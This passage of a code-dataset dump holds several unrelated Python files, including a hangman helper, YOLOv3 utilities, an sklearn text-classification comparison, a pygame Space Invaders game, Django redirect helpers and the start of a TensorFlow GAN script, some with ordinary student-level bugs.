(AGPLv3+)',\n\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n ],\n keywords='Kaltura API client',\n description='A Python module for accessing the Kaltura API.',\n long_description=long_description,\n long_description_content_type=\"text/plain\"\n)\n","sub_path":"pypi_install_script/KalturaApiClient-15.20.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"184433277","text":"from itertools import combinations\r\nfrom sys import stdin\r\n \r\nt = int(input())\r\nfor i in range(t):\r\n\tn = int(input())\r\n\ta = map(int, stdin.readline().split())\r\n\tb = sum(1 for i in a if i <= 0)\r\n\tif (b == len(a)):\r\n\t\tprint (sum(a))\r\n\telse:\r\n\t\tlis1 = []\r\n\t\tsum1 = 0\r\n\t\tfor j in range(1, len(a)):\r\n\t\t\tlis1.append(tuple(combinations(a, i)))\r\n\t\tfor j in lis1:\r\n\t\t\tsum1 += (len(j)*sum(j)) + ((len(a)-len(j))*(set(a)-set(j)))\r\n\t\tprint (sum1)\r\n","sub_path":"NEO01 - 40-100.py","file_name":"NEO01 - 40-100.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"377283056","text":"def isWordGuessed(secretWord, lettersGuessed):\n '''\n secretWord: string, the word the user is guessing\n lettersGuessed: list, what letters have been guessed so far\n returns: boolean, True if all the letters of secretWord are in lettersGuessed;\n False otherwise\n '''\n # FILL IN YOUR CODE HERE...\n temp=['_'] * len(secretWord)\n letters_used=[]\n for letter in range(0,len(lettersGuessed)):\n if (lettersGuessed[letter] not in 
letters_used):\n for letter_in_word in range(0, len(secretWord)):\n if (lettersGuessed[letter] == secretWord[letter_in_word]):\n temp[letter_in_word] = (lettersGuessed[letter])\n letters_used.append(lettersGuessed[letter])\n\n return (' '.join(temp))\n\n\ndef main():\n print (isWordGuessed('broccoli', ['z', 'x', 'q', 'b', 'r', 'o', 'c', 'c', 'o', 'l', 'i']))\n print (isWordGuessed('apple', ['e', 'i', 'k', 'p', 'r', 's']))\n\nmain()","sub_path":"edx_python_practice/Hangman/user_guess.py","file_name":"user_guess.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"605901721","text":"import torch\n\n\ndef select_device(force_cpu=False):\n if force_cpu:\n cuda = False\n device = torch.device('cpu')\n else:\n cuda = torch.cuda.is_available()\n device = torch.device('cuda:0' if cuda else 'cpu')\n\n if torch.cuda.device_count() > 1:\n device = torch.device('cuda' if cuda else 'cpu')\n print('Found %g GPUs' % torch.cuda.device_count())\n # print('Multi-GPU Issue: https://github.com/ultralytics/yolov3/issues/21')\n # torch.cuda.set_device(0) # OPTIONAL: Set your GPU if multiple available\n # print('Using ', torch.cuda.device_count(), ' GPUs')\n\n print('Using %s %s\\n' % (device.type, torch.cuda.get_device_properties(0) if cuda else ''))\n return device\n\ndef xyxy2xywh(x):\n # Convert bounding box format from [x1, y1, x2, y2] to [x, y, w, h]\n y = torch.zeros_like(x) if isinstance(x, torch.Tensor) else np.zeros_like(x)\n y[:, 0] = (x[:, 0] + x[:, 2]) / 2\n y[:, 1] = (x[:, 1] + x[:, 3]) / 2\n y[:, 2] = x[:, 2] - x[:, 0]\n y[:, 3] = x[:, 3] - x[:, 1]\n return y\n","sub_path":"yolov3_clw/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"46184342","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights\n# Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\").\n# You may not use this file except in compliance with the License.\n# A copy of the License is located at\n#\n# http://aws.amazon.com/apache2.0/\n#\n# or in the \"license\" file accompanying this file. This file is\n# distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS\n# OF ANY KIND, either express or implied. 
See the License for the\n# specific language governing permissions and limitations under the\n# License.\n#\nimport pprint\nimport six\nimport typing\nfrom enum import Enum\n\n\nif typing.TYPE_CHECKING:\n from typing import Dict, Optional\n\n\nclass Error(object):\n \"\"\"Error from LWA Client request.\n\n :param error_description: Description of the error\n :type error_description: (optional) str\n :param error_type: Type of error\n :type error_type: (optional) str\n \"\"\"\n deserialized_types = {\n 'error_description': 'str',\n 'error_type': 'str'\n }\n\n attribute_map = {\n 'error_description': 'error_description',\n 'error_type': 'error'\n }\n\n def __init__(self, error_description=None, error_type=None):\n # type: (Optional[str], Optional[str]) -> None\n \"\"\"\n :param error_description: Description of the error\n :type error_description: (optional) str\n :param error_type: Type of error\n :type error_type: (optional) str\n \"\"\"\n self.__discriminator_value = None\n\n self.error_description = error_description\n self.error_type = error_type\n\n def to_dict(self):\n # type: () -> Dict[str, object]\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {} # type: Dict\n\n for attr, _ in six.iteritems(self.deserialized_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else\n x.value if isinstance(x, Enum) else x,\n value\n ))\n elif isinstance(value, Enum):\n result[attr] = value.value\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else\n (item[0], item[1].value)\n if isinstance(item[1], Enum) else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n # type: () -> str\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n # type: () -> str\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n # type: (object) -> bool\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, Error):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n # type: (object) -> bool\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other","sub_path":"ask-sdk-model/ask_sdk_model/services/lwa/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"309210765","text":"import tkinter as tk\nimport os\nimport math\nimport threading\nimport time\n\nclass View(tk.Frame):\n def __init__(self, parent, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.parent = parent\n self.parent.wm_title('Tkinter MVC Demo')\n self.parent.wm_geometry('800x600')\n\n\n self.area = tk.StringVar()\n self.area.set('Circle information')\n lbl = tk.Label(self.parent, text='hello', textvariable=self.area, fg='red', anchor=tk.W, font='TkFixedFont')\n lbl.pack()\n\n '''def update_old(self, subject, *args, **kwargs):\n msg = 'Circle: ({}, {}), r: {}, Area: {}'.format(subject.x, subject.y, subject.r, subject.area())\n self.area.set(msg)\n '''\n\n def update(self, text):\n msg = '{}'.format(text)\n self.area.set(msg)\n\n\nclass Model(threading.Thread):\n def __init__(self, gui):\n threading.Thread.__init__(self)\n 
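        # (editor's note: hedged aside, not in the original file) the View
        # reference stored below is how this worker thread pushes status text
        # into the Tk label via View.update(); Tkinter is not thread-safe,
        # so a sturdier variant (assumed names, sketch only) would hand
        # messages over a queue that the GUI thread drains instead:
        #   self.msgs = queue.Queue()   # worker side: self.msgs.put(msg)
        #   # GUI side: self.parent.after(100, poll)  # poll() drains msgs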
self.gui = gui\n self.x = 0\n self.y = 0\n self.r = 1\n print(self.area())\n\n\n def area(self):\n return math.pi * self.r * self.r\n \n\n\n def run(self):\n print(self.area())\n while True:\n self.r += 1 \n print('r = {}, area = {}'.format(self.x, self.area()))\n\n\n msg = 'Circle: ({}, {}), r: {}, Area: {}'.format(self.x, self.y, self.r, self.area())\n self.gui.update(msg)\n time.sleep(1)\n\n\n\n\n\nif __name__ == '__main__':\n\n view = View(tk.Tk())\n\n model = Model(view)\n\n model.start()\n tk.mainloop()\n","sub_path":"python/gag/gui2.py","file_name":"gui2.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"266225365","text":"\nimport sklearn\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport itertools\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn import linear_model\nfrom sklearn import neighbors\nfrom sklearn import metrics\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn import svm\nfrom sklearn.naive_bayes import GaussianNB\n\nfrom sklearn.decomposition import TruncatedSVD\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom sklearn import neighbors, datasets\n\n\ndef load_data():\n # import and filter data\n newsgroups_train = fetch_20newsgroups(subset='train',shuffle=True, remove=('headers', 'footers', 'quotes'))\n newsgroups_test = fetch_20newsgroups(subset='test',shuffle=True, remove=('headers', 'footers', 'quotes'))\n\n # newsgroups_train = fetch_20newsgroups(subset='train',remove=('headers', 'footers', 'quotes'))\n # newsgroups_test = fetch_20newsgroups(subset='test',remove=('headers', 'footers', 'quotes'))\n class_names = newsgroups_train.target_names\n\n return newsgroups_train, newsgroups_test, class_names\n\ndef bow_features(train_data, test_data):\n # Bag-of-words representation\n bow_vectorize = CountVectorizer()\n bow_train = bow_vectorize.fit_transform(train_data.data) #bag-of-word features for training data\n bow_test = bow_vectorize.transform(test_data.data)\n feature_names = bow_vectorize.get_feature_names() #converts feature index to the word it represents.\n shape = bow_train.shape\n print('{} train data points.'.format(shape[0]))\n print('{} feature dimension.'.format(shape[1]))\n print('Most common word in training set is \"{}\"'.format(feature_names[bow_train.sum(axis=0).argmax()]))\n return bow_train, bow_test, feature_names\n\ndef tf_idf_features(train_data, test_data):\n # Bag-of-words representation\n tf_idf_vectorize = TfidfVectorizer(ngram_range=(1, 3), stop_words='english')\n tf_idf_train = tf_idf_vectorize.fit_transform(train_data.data) #bag-of-word features for training data\n feature_names = tf_idf_vectorize.get_feature_names() #converts feature index to the word it represents.\n tf_idf_test = tf_idf_vectorize.transform(test_data.data)\n return tf_idf_train, tf_idf_test, feature_names\n\ndef bnb_baseline(bow_train, train_labels, bow_test, test_labels):\n # training the baseline model\n binary_train = (bow_train>0).astype(int)\n binary_test = (bow_test>0).astype(int)\n\n model = BernoulliNB()\n model.fit(binary_train, 
train_labels)\n\n # evaluate the baseline model\n train_pred = model.predict(binary_train)\n print('BernoulliNB baseline train accuracy = {}'.format((train_pred == train_labels).mean()))\n test_pred = model.predict(binary_test)\n print('BernoulliNB baseline test accuracy = {}'.format((test_pred == test_labels).mean()))\n\n return model\n\ndef randomForest(train_bow_tf_idf, train_labels, bow_test_tf_idf, test_labels):\n model = AdaBoostClassifier(n_estimators=100)\n model.fit(train_bow_tf_idf, train_labels)\n\n print()\n print('------- Random Forest -------')\n # evaluate the model\n print('Default hyperparameters:')\n print(model.get_params())\n train_pred = model.predict(train_bow_tf_idf)\n print('Random Forest train accuracy = {}'.format((train_pred == train_labels).mean()))\n test_pred = model.predict(bow_test_tf_idf)\n print('Random Forest test accuracy = {}'.format((test_pred == test_labels).mean()))\n return model\n\ndef Multi_NB(train_bow_tf_idf, train_labels, bow_test_tf_idf, test_labels):\n # training the Multinomial_NB model\n model = MultinomialNB(alpha=0.015)\n model.fit(train_bow_tf_idf, train_labels)\n\n print()\n print('------- Multinomial Naive Bayes -------')\n # evaluate the model\n print('Default hyperparameters:')\n print(model.get_params())\n train_pred = model.predict(train_bow_tf_idf)\n print('Multinomial NB train accuracy = {}'.format((train_pred == train_labels).mean()))\n test_pred = model.predict(bow_test_tf_idf)\n print('Multinomial NB test accuracy = {}'.format((test_pred == test_labels).mean()))\n\n # # gridsearch for best Hyperparameter\n # parameters = {'alpha': (1, 0.1, 0.01, 0.015, 0.001)}\n # gs_clf = GridSearchCV(model, parameters, n_jobs=-1)\n # gs_clf = gs_clf.fit(train_bow_tf_idf, train_labels)\n #\n # best_parameters = gs_clf.best_estimator_.get_params()\n # print('Best params using gridSearch:')\n # print(best_parameters)\n # gstrain_pred = gs_clf.predict(train_bow_tf_idf)\n # print('New hyperparameters Multinomial NB train accuracy = {}'.format((gstrain_pred == train_labels).mean()))\n # gstest_pred = gs_clf.predict(bow_test_tf_idf)\n # print('New hyperparameters Multinomial NB test accuracy = {}'.format((gstest_pred == test_labels).mean()))\n # print('---------------------------------------')\n # print()\n\n return model, test_pred\n\ndef Guassian_NB(train_bow_tf_idf, train_labels, bow_test_tf_idf, test_labels):\n # training the Gaussian_NB model\n model = GaussianNB()\n model.fit(train_bow_tf_idf.toarray(), train_labels)\n\n print()\n print('------- Gaussian Naive Bayes -------')\n # evaluate the model\n print('Default hyperparameters:')\n print(model.get_params())\n train_pred = model.predict(train_bow_tf_idf.toarray())\n print('Gaussian NB train accuracy = {}'.format((train_pred == train_labels).mean()))\n test_pred = model.predict(bow_test_tf_idf)\n print('Gaussian NB test accuracy = {}'.format((test_pred == test_labels).mean()))\n\n # # gridsearch for best Hyperparameter\n # parameters = {'alpha': (1, 0.1, 0.01, 0.015, 0.001)}\n # gs_clf = GridSearchCV(model, parameters, n_jobs=-1)\n # gs_clf = gs_clf.fit(train_bow_tf_idf, train_labels)\n #\n # best_parameters = gs_clf.best_estimator_.get_params()\n # print('Best params using gridSearch:')\n # print(best_parameters)\n # gstrain_pred = gs_clf.predict(train_bow_tf_idf)\n # print('New hyperparameters Gaussian NB train accuracy = {}'.format((gstrain_pred == train_labels).mean()))\n # gstest_pred = gs_clf.predict(bow_test_tf_idf)\n # print('New hyperparameters Gaussian NB test accuracy = 
{}'.format((gstest_pred == test_labels).mean()))\n # print('---------------------------------------')\n # print()\n\n return model\n\ndef SVM(train_bow_tf_idf, train_labels, bow_test_tf_idf, test_labels):\n # training the support vector machine (SVM) model. Linear classifiers (SVM) with SGD training\n\n model = SGDClassifier(loss='squared_hinge', average=100, penalty='l2', alpha=0.0001, random_state=None, max_iter=100, tol=None, n_jobs=-1)\n model.fit(train_bow_tf_idf, train_labels)\n\n print()\n print('------- Support Vector Machine (SVM) -------')\n # evaluate the model\n print('Default hyperparameters:')\n print(model.get_params())\n train_pred = model.predict(train_bow_tf_idf)\n print('SVM train accuracy = {}'.format((train_pred == train_labels).mean()))\n test_pred = model.predict(bow_test_tf_idf)\n print('SVM test accuracy = {}'.format((test_pred == test_labels).mean()))\n\n # # gridsearch for best Hyperparameter\n # parameters = {'alpha': (1, 0.1, 0.01, 0.001, 0.0001 ),\n # 'loss': ('squared_hinge', 'hinge' )\n # }\n # gs_clf = GridSearchCV(model, parameters, n_jobs=-1)\n # gs_clf = gs_clf.fit(train_bow_tf_idf, train_data.target)\n #\n # best_parameters = gs_clf.best_estimator_.get_params()\n # print('Best params using gridSearch:')\n # print(best_parameters)\n # gstrain_pred = gs_clf.predict(train_bow_tf_idf)\n # print('New hyperparameters SVM train accuracy = {}'.format((gstrain_pred == train_labels).mean()))\n # gstest_pred = gs_clf.predict(bow_test_tf_idf)\n # print('New hyperparameters SVM test accuracy = {}'.format((gstest_pred == test_labels).mean()))\n # print('---------------------------------------')\n # print()\n\n return model, test_pred\n\ndef SVM2(train_bow_tf_idf, train_labels, bow_test_tf_idf, test_labels):\n # training the support vector machine (SVM) model. 
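    # (editor's note: hedged aside, not original code) unlike the SGD-trained
    # linear model in SVM() above, svm.SVC below solves the kernelized dual
    # problem; kernel='poly', degree=3 scores with
    #   K(x, z) = (gamma * <x, z> + coef0) ** 3
    # which is far slower on ~11k tf-idf documents, presumably why the SVM2
    # call is left commented out in __main__.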
Linear classifiers (SVM) with SGD training\n\n model = svm.SVC(kernel='poly', degree=3)\n model.fit(train_bow_tf_idf, train_labels)\n\n print()\n print('------- Support Vector Machine 2 Polynomial Degree 3 (SVM) -------')\n # evaluate the model\n print('Default hyperparameters:')\n print(model.get_params())\n train_pred = model.predict(train_bow_tf_idf)\n print('SVM train accuracy = {}'.format((train_pred == train_labels).mean()))\n test_pred = model.predict(bow_test_tf_idf)\n print('SVM test accuracy = {}'.format((test_pred == test_labels).mean()))\n\n return model\n\n\ndef LR(train_bow_tf_idf, train_labels, bow_test_tf_idf, test_labels):\n # training Logistic Regression Classifier model\n\n LR = linear_model.LogisticRegression()\n # model = LR.fit(train_bow_tf_idf, train_labels)\n model = LR.fit(train_bow_tf_idf, train_labels)\n\n print()\n print('------- Logistic Regression Classifier -------')\n # evaluate the model\n print('Default hyperparameters:')\n print(model.get_params())\n train_pred = model.predict(train_bow_tf_idf)\n print('Logistic Regression train accuracy = {}'.format((train_pred == train_labels).mean()))\n test_pred = model.predict(bow_test_tf_idf)\n print('Logistic Regression test accuracy = {}'.format((test_pred == test_labels).mean()))\n\n # gridsearch for best Hyperparameter\n parameters = {'C': (1, 0.1, 0.01, 0.001)\n # 'penalty': ('l1', 'l2'),\n # 'dual': (False, True)\n }\n gs_clf = GridSearchCV(model, parameters, n_jobs=-1)\n gs_clf = gs_clf.fit(train_bow_tf_idf, train_data.target)\n\n best_parameters = gs_clf.best_estimator_.get_params()\n print('Best params using gridSearch:')\n print(best_parameters)\n gstrain_pred = gs_clf.predict(train_bow_tf_idf)\n print('New hyperparameters Logistic Regression train accuracy = {}'.format((gstrain_pred == train_labels).mean()))\n gstest_pred = gs_clf.predict(bow_test_tf_idf)\n print('New hyperparameters Logistic Regression test accuracy = {}'.format((gstest_pred == test_labels).mean()))\n print('---------------------------------------')\n print()\n\ndef KNN(train_bow_tf_idf, train_labels, bow_test_tf_idf, test_labels, K):\n # training KNN Classifier model\n\n KNN = neighbors.KNeighborsClassifier(K, weights='distance')\n model = KNN.fit(train_bow_tf_idf, train_data.target)\n\n print()\n print('------- KNN Classifier -------')\n # evaluate the model\n print('Default hyperparameters:')\n print(model.get_params())\n train_pred = model.predict(train_bow_tf_idf)\n print('KNN Regression train accuracy = {}'.format((train_pred == train_labels).mean()))\n test_pred = model.predict(bow_test_tf_idf)\n print('KNN Regression test accuracy = {}'.format((test_pred == test_labels).mean()))\n\n\ndef plot_confusion_matrix_color(matrix_c, classes,\n title='Confusion matrix',\n cmap=plt.cm.Reds):\n print('Confusion matrix')\n\n print(matrix_c)\n\n plt.imshow(matrix_c, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=90)\n plt.yticks(tick_marks, classes)\n\n fmt ='d'\n thresh = matrix_c.max() / 2.\n for i, j in itertools.product(range(matrix_c.shape[0]), range(matrix_c.shape[1])):\n plt.text(j, i, format(matrix_c[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if matrix_c[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\nif __name__ == '__main__':\n train_data, test_data, class_names = load_data()\n\n # Count Vectorization\n train_bow, test_bow, feature_names = 
bow_features(train_data, test_data)\n\n # TF-idf\n train_bow_tf_idf, test_bow_tf_idf, feature_names_tf_idf = tf_idf_features(train_data, test_data)\n\n # Baseline Bernoulli Naive Bayes\n bnb_model = bnb_baseline(train_bow, train_data.target, test_bow, test_data.target)\n print(bnb_model)\n\n # Multinomial NB\n model_MNB ,test_pred = Multi_NB(train_bow_tf_idf, train_data.target, test_bow_tf_idf, test_data.target)\n\n # Gaussian NB\n # model_MNB = Guassian_NB(train_bow_tf_idf, train_data.target, test_bow_tf_idf, test_data.target)\n\n # RandomForest\n # model_RF = randomForest(train_bow_tf_idf, train_data.target, test_bow_tf_idf, test_data.target)\n\n # SVM Kernel 3rd Degree Polynomial\n # model_SVM2 = SVM2(train_bow_tf_idf, train_data.target, test_bow_tf_idf, test_data.target)\n\n # Logistic Regression\n model_LR = LR(train_bow_tf_idf, train_data.target, test_bow_tf_idf, test_data.target)\n\n # KNN\n # model_LR = KNN(train_bow_tf_idf, train_data.target, test_bow_tf_idf, test_data.target, 10)\n\n # SVM Linear SGD\n model_SVM, test_pred = SVM(train_bow_tf_idf, train_data.target, test_bow_tf_idf, test_data.target)\n\n ### Compute confusion matrix for SVM Linear SGD ###\n cnf_matrix = confusion_matrix(test_data.target, test_pred)\n np.set_printoptions(precision=3)\n\n # Plot non-normalized confusion matrix\n plt.figure()\n plot_confusion_matrix_color(cnf_matrix, classes=class_names,\n title='Confusion matrix')\n\n plt.show()\n\n","sub_path":"q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":13702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"362185990","text":"import pygame\nfrom spaceship import Spaceship\nfrom alien import Alien\nimport random\n\nWIDTH = 1000\nHEIGHT = 700\n\ndef draw_player_health(surf, x, y, pct):\n if pct < 0:\n pct = 0\n BAR_LENGTH = 65\n BAR_HEIGHT = 10\n fill = pct * BAR_LENGTH\n outline_rect = pygame.Rect(x, y, BAR_LENGTH, BAR_HEIGHT)\n fill_rect = pygame.Rect(x, y, fill, BAR_HEIGHT)\n if pct > 0.6:\n col = (0,255,0)\n elif pct > 0.3:\n col = (255, 255, 0)\n else:\n col = (255,0,0)\n pygame.draw.rect(surf, col, fill_rect)\n pygame.draw.rect(surf, (255, 255, 255), outline_rect, 2)\n\n\nclass Game:\n def __init__(self):\n\n pygame.init()\n self.screen = pygame.display.set_mode((1000, 700))\n self.background = pygame.image.load(\"img/background1.jpg\")\n self.background = pygame.transform.scale(self.background, (1000, 700))\n pygame.display.set_caption(\"Space Invaders\")\n self.level = 0\n self.wave_length = 3\n self.all_sprites_list = pygame.sprite.Group()\n self.enemy_sprites_list = pygame.sprite.Group()\n self.lazer_sprites_list = pygame.sprite.Group()\n # self.spaceship_lazer_sprites_list = pygame.sprite.Group()\n self.playing = True\n self.spaceship = Spaceship(self, x=450, y=600)\n self.clock = pygame.time.Clock()\n\n # def new(self):\n\n def run(self):\n while self.playing:\n self.clock.tick(60)\n self.events()\n self.update()\n self.draw()\n\n def update(self):\n if len(self.enemy_sprites_list) == 0:\n self.level += 1\n self.wave_length +=2\n self.create_aliens()\n pos = pygame.mouse.get_pos()\n self.spaceship.move(pos[0])\n self.all_sprites_list.update()\n # print(self.lazer_sprites_list)\n hit1 = pygame.sprite.groupcollide(self.enemy_sprites_list, self.lazer_sprites_list, False, True, pygame.sprite.collide_mask)\n for enemy, lazer in hit1.items():\n if lazer[0].shooter == 1:\n enemy.health -= 1\n\n hit2 = pygame.sprite.spritecollide(self.spaceship, self.enemy_sprites_list, True)\n if hit2 or 
any(alien.off_screen() for alien in self.enemy_sprites_list):\n self.spaceship.lives -= 1\n\n def draw(self):\n self.screen.fill((0, 0, 0))\n self.screen.blit(self.background, (0, 0))\n self.all_sprites_list.draw(self.screen)\n font = pygame.font.SysFont(\"courier\", 25, bold=True)\n text = font.render(\"Lives: \" + str(self.spaceship.lives), 1, (0, 0, 0))\n self.screen.blit(text, (20, 10))\n text = font.render(\"Level: \" + str(self.level), 1, (0, 0, 0))\n self.screen.blit(text, (850, 10))\n for alien in self.all_sprites_list:\n if isinstance(alien, Alien):\n alien.draw_alien_health()\n self.screen.blit(alien.image, alien.rect)\n draw_player_health(self.screen, self.spaceship.rect.x, self.spaceship.rect.y + 70, self.spaceship.health / 100)\n pygame.display.flip()\n\n def events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.playing = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n self.spaceship.shoot()\n\n def quit_game(self):\n global running\n running = False\n\n def create_aliens(self):\n if self.level <= 5:\n choices = [1, 2]\n elif 5 < self.level <= 10:\n choices = [1, 2, 3]\n else:\n choices = [2, 3]\n for i in range(self.wave_length):\n Alien(self, random.randint(50, WIDTH - 100), random.randint(-1500, -100), random.choice(choices))\n\n\ng = Game()\nwhile g.playing:\n g.run()\npygame.quit()\n\n# all_sprites_list.add(spaceship)\n\n\n# enemy_sprites_list.add(alien)\n\n# running = True\n#\n#\n# while running:\n#\n# # for event in pygame.event.get():\n# # if event.type == pygame.QUIT:\n# # running = False\n# # if event.type ==pygame.KEYDOWN:\n# # if event.key == pygame.K_SPACE and spaceship in all_sprites_list:\n# # spaceship.shoot()\n# #\n# # screen.fill((0,0,0))\n# # screen.blit(background, (0,0))\n# #\n# # if len(enemy_sprites_list) == 0:\n# # level += 1\n# # wave_length += 2\n# # create_aliens(level, wave_length)\n# #\n# # pos = pygame.mouse.get_pos()\n# # spaceship.move(pos[0])\n# #\n# # for i in spaceship.lazers:\n# # all_sprites_list.add(i)\n# #\n# # hit = pygame.sprite.groupcollide(enemy_sprites_list, all_sprites_list, False, False)\n# # for i in hit:\n# # print(i)\n# # # if hit[i][0] == spaceship:\n# # # lives -= 1\n# # # else:\n# # # hit[i][0].kill()\n# # # if lives <= 0:\n# # # font = pygame.font.SysFont(\"Courier\", 74, bold=True)\n# # # text = font.render(\"GAME OVER\", 1, (0,0,0))\n# # # screen.blit(text, (300, 300))\n# # # pygame.display.flip()\n# # # pygame.time.wait(3000)\n# # # running = False\n# #\n# # all_sprites_list.draw(screen)\n# # enemy_sprites_list.draw(screen)\n# # font = pygame.font.SysFont(\"courier\", 25, bold=True)\n# # text = font.render(\"Lives: \" + str(lives), 1, (0, 0, 0))\n# # screen.blit(text, (20, 10))\n# # text = font.render(\"Level: \" + str(level), 1, (0, 0, 0))\n# # screen.blit(text, (850, 10))\n# # all_sprites_list.update()\n# # enemy_sprites_list.update()\n# #\n# # pygame.display.update()\n# clock.tick(60)\n# pygame.quit()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"306421987","text":"from django.conf import settings\r\nfrom django.core.urlresolvers import reverse\r\n\r\n\r\n\r\nLOGIN_REDIRECT_URLNAME = getattr(settings, \"LOGIN_REDIRECT_URLNAME\", \"\")\r\n\r\n\r\n\r\ndef get_default_redirect(request, redirect_field_name=\"next\",\r\n login_redirect_urlname=LOGIN_REDIRECT_URLNAME):\r\n \"\"\"\r\n Returns the URL to be used in login 
procedures by looking at different\r\n values in the following order:\r\n\r\n - a REQUEST value, GET or POST, named \"next\" by default.\r\n - LOGIN_REDIRECT_URL - the URL in the setting\r\n - LOGIN_REDIRECT_URLNAME - the name of a URLconf entry in the settings\r\n \"\"\"\r\n if login_redirect_urlname:\r\n default_redirect_to = reverse(login_redirect_urlname)\r\n else:\r\n default_redirect_to = settings.LOGIN_REDIRECT_URL\r\n redirect_to = request.REQUEST.get(redirect_field_name)\r\n # light security check -- make sure redirect_to isn't garabage.\r\n if not redirect_to or \"://\" in redirect_to or \" \" in redirect_to:\r\n redirect_to = default_redirect_to\r\n return redirect_to\r\n\r\n\r\ndef user_display(user):\r\n func = getattr(settings, \"ACCOUNT_USER_DISPLAY\", lambda user: user.username)\r\n return func(user)\r\n","sub_path":"colab/apps/account/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"175539410","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"/home/h4ckfu/Code/test/TheGANs/MNIST_data/\", one_hot=True)\n\n################### All your functions are belong... ##########################\n\n# http://bit.ly/leaky_relu\ndef my_leaky_relu(x):\n '''\n Basically choooses the max(x, x * 0.01) as an activation function\n '''\n return tf.nn.leaky_relu(x, alpha=0.01)\n\n### The G ###\n# the z is going to be the random noise that we start with...\ndef generator(z, reuse=None):\n\n with tf.variable_scope('gen', reuse=reuse):\n\n hidden1 = tf.layers.dense(inputs = z, units=128, activation=my_leaky_relu)\n hidden2 = tf.layers.dense(inputs = hidden1, units = 128, activation=my_leaky_relu)\n\n # 784, of course, is the flatened 28x28 pixel image we want to generate\n # tanh - NOT 0 to 1 it's -1 to 1 -- so random noise will be -1 - 1 as well\n output = tf.layers.dense(hidden2, units = 784, activation = tf.nn.tanh)\n\n return output\n\n\n### The D ###\ndef discriminator(X, reuse=None):\n\n with tf.variable_scope('dis', reuse=reuse):\n\n hidden1 = tf.layers.dense(inputs = X, units = 128, activation=my_leaky_relu)\n hidden2 = tf.layers.dense(inputs = hidden1, units = 128, activation=my_leaky_relu)\n\n logits = tf.layers.dense(hidden2, units = 1) # probability of real or fake\n output = tf.sigmoid(logits) # sigmoid of the logits\n\n return output , logits\n\n\n### Helper function for calculating loss with cross entropy (with_logits)\ndef loss_func(logits_in, labels_in):\n return tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(\n logits = logits_in, labels=labels_in))\n\n\n### TensorFlow placeholders\n# Places in memory where we'll store values later when defing these in the feed_dict\n\n# shape = None (batch size, so any number of rows) x 784 pixels (columns)\nreal_images = tf.placeholder(tf.float32, shape=[None, 784])\n\n# What we're feeding our generator - ,100 random points, its the holder for the noise\nz = tf.placeholder(tf.float32, shape=[None, 100])\n\n############################ Variables and such ###############################\n\nlearning_rate = 